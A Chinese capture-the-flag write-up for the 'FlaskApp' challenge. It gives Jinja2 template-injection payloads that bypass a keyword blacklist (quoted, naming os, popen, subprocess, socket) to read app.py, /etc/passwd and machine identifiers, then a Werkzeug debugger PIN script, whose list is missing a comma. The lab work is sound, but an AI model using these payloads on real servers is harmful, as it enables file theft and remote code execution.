[GYCTF2020]FlaskApp
先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤
随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
还是把这串命令加密一下然后解密,得到源码
可以在里面找到waf,过滤了很多字符。也可以找到执行我们输入的base64字符串的代码,通过GET方法将输入的字符串保存在txt中,如果解密后绕过了waf,则执行flash().
def waf(str):
black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
for x in black_list :
if x in str.lower() : return 1
@app.route('/decode';,methods=['POST','GET'])
def decode():
if request.values.get('text') :
text = request.values.get("text")
text_decode = base64.b64decode(text.encode())
tmp = "结果 : {0}".format(text_decode.decode())
if waf(tmp) :
flash("no no no !!")
return redirect(url_for('decode'))
res = render_template_string(tmp)
flash( res )
return redirect(url_for('decode'))
else :
text = ""
form = NameForm1(text)
return render_template("index.html",form = form, method = "解密" , img = "flask1.png")
可以用字符串拼接的方式绕过waf
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
找到了this_is_the_flag.txt文件,字符串拼接读取flag
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
在之前的报错页面点击右侧的终端图标会要求你输入pin码,所以这道题还有一种解法,可以参考这篇文章
https://blog.csdn.net/SopRomeo/article/details/105875248
https://blog.csdn.net/weixin_39997829/article/details/108849699
得到生成pin码所需要的六要素以后:
(1)用户名:flaskweb
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}
(2)modename:flaskapp
(3)app.py的绝对路径:/usr/local/lib/python3.7/site-packages/flask/app.py
(4)getattr(app, “name”, app.class.name):Flask
(5)mac地址的十进制数:02:42:ac:10:82:69(2485377860201)
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}
(6)docker机器id:1:name=systemd:/docker/07c230865b8e078edbc7b1c7fbf699627037f3e401b0382d96715c839a1d2b78 0::/system.slice/containerd.service
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}
然后跑一下脚本生成pin码379-433-719
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb'# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485377860201',# str(uuid.getnode()), /sys/class/net/ens33/address
'07c230865b8e078edbc7b1c7fbf699627037f3e401b0382d96715c839a1d2b78'# get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
可以看到我们已经能使用命令行了